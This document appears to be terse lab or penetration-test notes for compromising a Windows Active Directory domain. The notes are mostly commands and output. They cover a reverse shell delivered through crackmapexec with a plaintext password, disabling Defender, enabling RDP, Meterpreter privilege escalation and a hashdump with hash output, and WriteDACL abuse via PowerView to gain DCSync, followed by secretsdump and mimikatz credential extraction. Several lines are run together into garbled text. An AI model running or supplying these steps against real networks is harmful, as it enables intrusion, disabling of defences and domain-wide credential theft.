Initial foothold and Exploitation
Getting the Shell
proxychains crackmapexec smb 172.16.1.24 -u 'cyber_adm' -p 'Password123!' --put-file large.ps1 'text.ps1'
nc -lvnp 4447
proxychains crackmapexec smb 172.16.1.24 -u 'cyber_adm' -p 'Password123!' -x "powershell .\text.ps1"
SHELL> powershell "Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name 'fDenyTSConnections' -value 0"
SHELL> powershell "Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name 'UserAuthentication' -value 1"
powershell "Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'"
RDP
##didn"T had to do with alternatemethod the abover steps
proxychains xfreerdp /u:cyber_adm /v:172.16.1.24 /p:Password123!Powershell
Turn of AV
Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
#windows 7
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /fUpload Meterpreter shell
Executing the shell
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > migrate 1820
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ipsec:1000:aad3b435b51404eeaad3b435b51404ee:235b3c847d4ade90c5f5186cd23803af:::
Adding User to Legacy Web Servers
PS C:\Windows\system32> net group "Legacy Web Servers" cyber_adm /add /domain
Import-Module .\powerview.ps1WriteDACL
Combination 1
Add-DomainObjectAcl -TargetIdentity "DC=CORP,DC=LOCAL" -PrincipalIdentity cyber_adm -Domain corp.local -Rights All -VerboseDumping the Secrets
proxychains impacket-secretsdump 'corp.local/cyber_adm:Password123!@172.16.1.5'WRITE DACL and DCSYNC Extra Commands
Combination 4 (Almost worked)
Add-DomainObjectAcl -TargetIdentity USERS -PrincipalIdentity cyber_adm -Domain corp.local -Rights All -Verbose
Add-DomainObjectAcl -TargetIdentity 'DC01.CORP.LOCAL' -PrincipalIdentity cyber_adm -Domain corp.local -Rights All -Verbose
Add-DomainObjectAcl -TargetIdentity "DC=CORP,DC=LOCAL" -PrincipalIdentity cyber_adm -Domain corp.local -Rights All -Verbose
Add-DomainObjectAcl -TargetIdentity DC01 -PrincipalIdentity cyber_adm -Domain corp.local -Rights All -Verbose
Import-Module .\powerview.ps1
Add-DomainObjectAcl -TargetIdentity 'CORP.LOCAL' -PrincipalIdentity 'Legacy Web Servers' -Domain corp.local -Rights DCSync -Verbose
Add-DomainObjectAcl -TargetIdentity DC01 -PrincipalIdentity 'Legacy Web Servers' -Domain corp.local -Rights DCSync -Verbose
Add-DomainObjectAcl -TargetIdentity DC01.CORP.LOCAL -PrincipalIdentity 'Legacy Web Servers' -Domain corp.local -Rights DCSync -Verbose
Add-DomainObjectAcl -TargetIdentity Users -PrincipalIdentity 'Legacy Web Servers' -Domain corp.local -Rights All -Verbose
.\mimikatz-64.exe
privilege::debug
token::elevate
lsadump::dcsync /domain:corp.local /user:pgibbons
test commands
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | % {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | % {if ($_.Identity -eq $("$env:UserDomain\$env:UserName")) {$_}} | ? {$_.ActiveDirectoryRights -like "*"}
Get-ObjectAcl -DistinguishedName "dc=corp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
Get-ObjectAcl -SamAccountName 'Legacy Web Servers' -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "WriteDacl"}
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=corp,DC=local"}
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Users,DC=corp,DC=local" -and $_.IdentityReference -eq "CORP\Web Legacy Servers"}
([ADSI]"LDAP://CN=Legacy Web Servers,CN=Users,DC=corp,DC=local").PSBase.get_ObjectSecurity().GetOwner([System.Security.Principal.NTAccount]).Value
([ADSI]"LDAP://CN=Users,DC=corp,DC=local").PSBase.get_ObjectSecurity().GetOwner([System.Security.Principal.NTAccount]).Value